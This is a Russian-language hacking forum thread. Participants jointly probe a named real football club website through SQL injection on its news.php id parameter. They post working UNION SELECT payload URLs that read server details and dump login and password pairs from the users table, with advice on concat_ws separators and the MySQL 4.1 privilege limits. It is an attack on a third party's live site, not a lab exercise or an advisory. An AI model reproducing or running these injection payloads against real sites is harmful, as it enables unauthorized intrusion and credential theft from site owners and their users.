Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.

А что если при запросе из таблицы users по клонкам login,pass вернулось 'voidass'
База пустая чтоли? :Р Версия бд 4.1.18

Warning: getimagesize(6): failed to open stream: No such file or directory in /www/anthost/www/htdocs/fc-anji/news.php on line 141

Query failed: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

использовал знаменитый алгоритм шифрования AES:РРР

http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@versi on_compile_os,0x71),0x71),3,4,5,6/*

portbld-freebsd5.4


http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@based ir,0x71),0x71),3,4,5,6/*

Тут неполучилось:Р,с одним @ тоже))

иди доки лучше по читай, здесь никто никому ничего не должен объснять или показывать.
Если что-то вернулось значит не пусто, используй объединение concat или concat_ws с разделителем можно просто :, а можно в хексе.
concat(user,':',pass)
concat_ws(0x3a,user,pass)

http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login, pass),3,4,5,6+from+users/*

Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:

void: pass ))))))

Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (

все правильно при таком запросе у тя будет
void;pass -> login: void pass: pass
0x3b -> разделитель ;
больше записей в users нету поэтому пустой рез.
Версия бд 4.1.18
Ну нет доступа это обычное дело, правильно права выставлены.

Кто-то постарался знач : ) Пасип что разъяснил:Р

information_schema присутствует с версии 5 и далее

В интернете мало доков по http? Скачай себе http intruder, там есть конструктор пакетов =\

__________________

Хыхы,а я и забыл ))))